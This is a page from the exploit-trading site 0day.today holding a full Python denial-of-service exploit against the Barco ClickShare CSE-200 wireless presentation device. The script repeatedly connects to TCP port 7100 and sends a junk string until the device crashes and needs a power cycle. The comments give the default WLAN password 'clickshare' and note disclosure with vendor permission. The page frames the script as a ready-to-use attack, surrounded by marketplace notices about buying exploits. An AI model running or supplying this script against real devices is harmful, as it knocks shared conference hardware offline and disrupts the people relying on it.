0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Barco ClickShare CSE-200 Denial Of Service Vulnerability
[#!/usr/bin/python
# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
# Date: 11-04-2018
# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
# Exploit Author: Florian Hauser
# Contact: florian DOT g DOT hauser AT gmail DOT com
# CVE: requested by Barco
# Category: Hardware
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Florian Hauser is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Florian Hauser's
# responsibility.
#
# Use them at your own risk!
################
# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
# not only disconnects all clients but also results in a crash of this hardware device
# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
# I got permission from Barco to disclose this vulnerability.
# This affects potentially all other ClickShare products, Barco confirms
import socket
import sys
from time import sleep
if len(sys.argv) != 2:
print "Usage: exploit.py <ip>"
sys.exit(0)
# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
# 6-7 requests do the job usually
for x in range(1,50):
#Create a new socket each time because otherwise the service drops the socket
#Same request cannot be sent several times in sequence
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Connect to vulnerable TCP port 7100
connect=s.connect((str(sys.argv[1]), 7100))
s.send('some evil string \r\n\n')
print "Buffer " + str(x) + " sent...\n"
result=s.recv(1024)
print result
s.close()
#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
sleep(7)
# 0day.today [2024-11-15] #